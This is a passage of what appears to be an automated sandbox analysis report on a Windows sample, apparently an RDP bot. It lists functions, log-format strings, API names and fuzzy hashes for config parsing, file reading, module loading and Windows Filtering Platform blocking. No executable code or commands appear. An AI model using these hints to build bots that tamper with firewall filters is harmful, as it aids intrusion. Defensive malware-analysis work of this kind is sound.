                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                    • API String ID: 1004003707-386092548
                    • Opcode ID: d7ef4e8527c300b6e60fff9e20f006bb1be91614be483f3427c7aa1c32288de3
                    • Instruction ID: 59a03fd91cf941f7973be843405592af6ba53ba883e3e31ee83aeef11af832bb
                    • Opcode Fuzzy Hash: d7ef4e8527c300b6e60fff9e20f006bb1be91614be483f3427c7aa1c32288de3
                    • Instruction Fuzzy Hash: CD41ECA2A08947A1FA20AF52ACC4BB4A250BF44348FD84936D90D166D5DFBCB9B5C320
                    Function 00007FF70489A0F0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: _errno
                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                    • API String ID: 2918714741-1670302297
                    • Opcode ID: 8c79b365c077024c38f17f42c04b753b74df60f5a8e513a52fa5fe005987a0a9
                    • Instruction ID: a8d6c7c9a8b4acb21d7c1057776597ec787faba4156e3097647c4c8b217280e6
                    • Opcode Fuzzy Hash: 8c79b365c077024c38f17f42c04b753b74df60f5a8e513a52fa5fe005987a0a9
                    • Instruction Fuzzy Hash: 73218722A08A8696F611AF16FC80B99B750BF44744F884435EE4D47694DF7CE8A5C710
                    Function 00007FF7048914E2 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 91fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                    • String ID: .$1
                    • API String ID: 513531256-1839485796
                    • Opcode ID: 32402bb36cf6c4058c43ba99a49dc3a81660aa1839c62e2d7fd324598b5362bd
                    • Instruction ID: e29c1bd5ae638d92e9c3b9e20c6158b5d73d06868b4357976e139cc003387eed
                    • Opcode Fuzzy Hash: 32402bb36cf6c4058c43ba99a49dc3a81660aa1839c62e2d7fd324598b5362bd
                    • Instruction Fuzzy Hash: D0414322A0C64186F224BF12EC94BB9A250FF85784FC40431D90D57BD5CFACE571C750
                    Function 00007FF7048976D0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: DestroyEnumFwpmHandle0Providerwcscmp
                    • String ID: [E] (%s) -> FwpmProviderAdd0 failed(res=%08lx)$[E] (%s) -> FwpmProviderCreateEnumHandle0 failed(res=%08lx)$[E] (%s) -> FwpmProviderEnum0 failed(res=%08lx)$setup_filt_prov
                    • API String ID: 1522850966-2029202777
                    • Opcode ID: e01a2546dc137a85f423c8f89867c1a3d9276bb166f76ca6a144805d095920fa
                    • Instruction ID: 70c78d356ab0e195e0b1f8f4df2a2024b2839e89835fbb72e87d396dbb109e64
                    • Opcode Fuzzy Hash: e01a2546dc137a85f423c8f89867c1a3d9276bb166f76ca6a144805d095920fa
                    • Instruction Fuzzy Hash: 8251A522618F8191F7609F16FC80BAAA296FF44784F444535DA8D47B99EF3DE8A0C790
                    Function 00007FF704899621 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 89COMMON
                    Download Yara Rule
                    APIs
                    • FwpmEngineClose0.FWPUCLNT(?,?,?,?,?,?,00000000,00000215763F14D0,?,00007FF7048914B4,?,?,00000001,00007FF7048914D2), ref: 00007FF704899701
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: Close0EngineFwpmwcscmp
                    • String ID: [E] (%s) -> FwpmEngineOpen0 failed(res=%08lx)$app$ip4$svc$wfp_block
                    • API String ID: 4239307310-774261742
                    • Opcode ID: bc37717aaa125da59d133c60f9123bca4d000f7470b915232312e13a07abc2cb
                    • Instruction ID: f05a82a5b7e637cf33bf63d4d08fbd5e607d8cb647c53f0532825317a0afac5a
                    • Opcode Fuzzy Hash: bc37717aaa125da59d133c60f9123bca4d000f7470b915232312e13a07abc2cb
                    • Instruction Fuzzy Hash: 8331B491B1CA4391FA51BE57ACC0ABA92519F493C0FC80835EA0E477D5EF5CFC658360
                    Function 00007FF704896497 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: AttributesErrorFileLast
                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                    • API String ID: 1799206407-4111913120
                    • Opcode ID: 55f41800e1764709aa011a7321b8a8cc42a7450f45ffe44db308ed9fbd2e31db
                    • Instruction ID: f72733dde705805f3142fda4f66aabba696a3eef7c0d456766fd0351ef63c914
                    • Opcode Fuzzy Hash: 55f41800e1764709aa011a7321b8a8cc42a7450f45ffe44db308ed9fbd2e31db
                    • Instruction Fuzzy Hash: F121A451E0C84382FB646EAAACC4B7D91405F5074AFAC4D32D10EA92D8EF5CFCB55262
                    Function 00007FF704891C73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: AddressErrorLastProcfflushfwrite
                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                    • API String ID: 1224403792-3063791425
                    • Opcode ID: 60eb46d347e057fdabef9aa688644875f958b88ba8c0fdf82c797b715754816d
                    • Instruction ID: b59fa5feb0559220fe8e54a31fd0f5bcd9e3e284e8339723d04f85ab1ab4deeb
                    • Opcode Fuzzy Hash: 60eb46d347e057fdabef9aa688644875f958b88ba8c0fdf82c797b715754816d
                    • Instruction Fuzzy Hash: 8DF08151A0DA0382FA25AF57AC849B5A6526F04BD4FD84832DD5D0B7D4EF2CFD768320
                    Function 00007FF704891CF4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: ErrorLastLibraryLoadfflushfwrite
                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                    • API String ID: 4085810780-3386190286
                    • Opcode ID: 7f27e01a4b09a2fb507d16a597e75235df5eba0fadb702a3177a3972b388af36
                    • Instruction ID: 2c1dea7bf08aad973d6a31b6ba01942251d28b300e3e31394c3c10e91d97897e
                    • Opcode Fuzzy Hash: 7f27e01a4b09a2fb507d16a597e75235df5eba0fadb702a3177a3972b388af36
                    • Instruction Fuzzy Hash: 13F01751E0EA0740F9A1BF57ACC4DA0A6516F19B94B8C1C71C90D167D1EF5CB9B58320
                    Function 00007FF7048949A6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: f4da63c4789cf217afe351ff4f6dd43b543261fbf7b8fdb04ee6528f7bd42f17
                    • Instruction ID: 4f51eaf12c252f14d2e814458be1617bc15ec2ecf4b6497148fa16afbf635ced
                    • Opcode Fuzzy Hash: f4da63c4789cf217afe351ff4f6dd43b543261fbf7b8fdb04ee6528f7bd42f17
                    • Instruction Fuzzy Hash: D1F03013B0DA0341F956AE467C80BB991412F81BA5E8D0D358D5C0A6C1AF7D7CA38320
                    Function 00007FF70489499C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 66188fbad683bb74668b27566d1f38c8e5cf3bb503f2bc2aca81d20f34e51556
                    • Instruction ID: 66093d1820e0408654188f5ce1ba275629a297463c1ead15727bf940c226423b
                    • Opcode Fuzzy Hash: 66188fbad683bb74668b27566d1f38c8e5cf3bb503f2bc2aca81d20f34e51556
                    • Instruction Fuzzy Hash: A4F03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    Function 00007FF704894992 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 16974e12e65d0088ddd2aef65ce91995e315f23da78915dcd85e6b3e4ba2f098
                    • Instruction ID: 471b3bff0586ec136dc95a8933df64422d513b9a2d9e2133d451bacefe279388
                    • Opcode Fuzzy Hash: 16974e12e65d0088ddd2aef65ce91995e315f23da78915dcd85e6b3e4ba2f098
                    • Instruction Fuzzy Hash: 62F03A13B0DA0341F956AE46BC81BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    Function 00007FF704894988 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 61536f64e2f8ffc8f51db8786fdea12ce0a1234ad630e6579192e398d01fd7e8
                    • Instruction ID: 2bf27b2ae6d6eec0c27612c2c8fc7362068cfee71c6fc820ee6dd9d7b4cc56f9
                    • Opcode Fuzzy Hash: 61536f64e2f8ffc8f51db8786fdea12ce0a1234ad630e6579192e398d01fd7e8
                    • Instruction Fuzzy Hash: 1BF03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    Function 00007FF70489497E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: d09cfe2e7f27015ffce74da7658019a43f43db689c1ca60bcd7ebf9e5b6c6232
                    • Instruction ID: b86c9df7f7d8c00c1de3fd7fae0b5c9d88931ac29f3a9f4d1ff10f1936957d94
                    • Opcode Fuzzy Hash: d09cfe2e7f27015ffce74da7658019a43f43db689c1ca60bcd7ebf9e5b6c6232
                    • Instruction Fuzzy Hash: D9F03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    Function 00007FF704894B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: e4515d24f520ce7de176e247dfece73cf68b1250ec6576f9dcf6ba3ae7f22860
                    • Instruction ID: a595b5299544ebb49fcf8a75d1f21148fd12d68bd1de30331cc1e1ce6760566c
                    • Opcode Fuzzy Hash: e4515d24f520ce7de176e247dfece73cf68b1250ec6576f9dcf6ba3ae7f22860
                    • Instruction Fuzzy Hash: 45F03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D368D5C0A6C1AF7DBCA38320
                    Function 00007FF704894B0E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: e4515d24f520ce7de176e247dfece73cf68b1250ec6576f9dcf6ba3ae7f22860
                    • Instruction ID: a595b5299544ebb49fcf8a75d1f21148fd12d68bd1de30331cc1e1ce6760566c
                    • Opcode Fuzzy Hash: e4515d24f520ce7de176e247dfece73cf68b1250ec6576f9dcf6ba3ae7f22860
                    • Instruction Fuzzy Hash: 45F03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D368D5C0A6C1AF7DBCA38320
                    Function 00007FF7048947B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 61536f64e2f8ffc8f51db8786fdea12ce0a1234ad630e6579192e398d01fd7e8
                    • Instruction ID: 2bf27b2ae6d6eec0c27612c2c8fc7362068cfee71c6fc820ee6dd9d7b4cc56f9
                    • Opcode Fuzzy Hash: 61536f64e2f8ffc8f51db8786fdea12ce0a1234ad630e6579192e398d01fd7e8
                    • Instruction Fuzzy Hash: 1BF03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    Function 00007FF7048947A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
